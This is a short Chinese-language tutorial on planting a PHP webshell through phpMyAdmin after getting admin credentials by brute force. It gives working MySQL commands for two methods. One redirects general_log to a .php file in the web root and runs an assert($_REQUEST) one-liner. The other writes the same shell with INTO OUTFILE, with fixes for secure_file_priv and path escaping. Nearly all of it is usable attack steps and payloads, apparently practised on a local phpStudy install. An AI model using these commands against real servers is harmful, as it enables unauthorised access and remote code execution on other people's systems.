mysql写getshell--phpmyadmin

利用mysql 语句写webshell

利用爆破拿到phpmyadmin 的管理员账号密码

通过信息收集，查看配置信息

绝对路径
C:/phpStudy/PHPTutorial/

方法一
通过日志写入webshell

查询日志设置
show variables like “%general%”

set global general_log='on'
set global general_log_file='C:/phpStudy/PHPTutorial/WWW/indes.php'

错误操作

select '<?php assert($_POST["pass"]);?>'

正确操作

select '<?php assert($_REQUEST["pass"]);?>'

方法二

直接写入webshell

select '<?php assert($_REQUEST["pass"]);?>' INTO OUTFILE 'C:/phpStudy/PHPTutorial/WWW/indes3.php'

报错：

SHOW VARIABLES LIKE "%secure%"

set global secure_auth='on'

在次写入仍然报错
需要把

Secure_file_priv=””

添加到 my.ini配置文件中

重启phpstudy

重新写入

select '<?php assert($_REQUEST["pass"]);?>' INTO OUTFILE 'C:/phpStudy/PHPTutorial/WWW/indes3.php'

注意：
有些时候斜杠会被转义，需要用双斜杠
需要

select '<?php assert($_REQUEST["pass"]);?>' INTO OUTFILE 'C://phpStudy//PHPTutorial//WWW//indes3.php'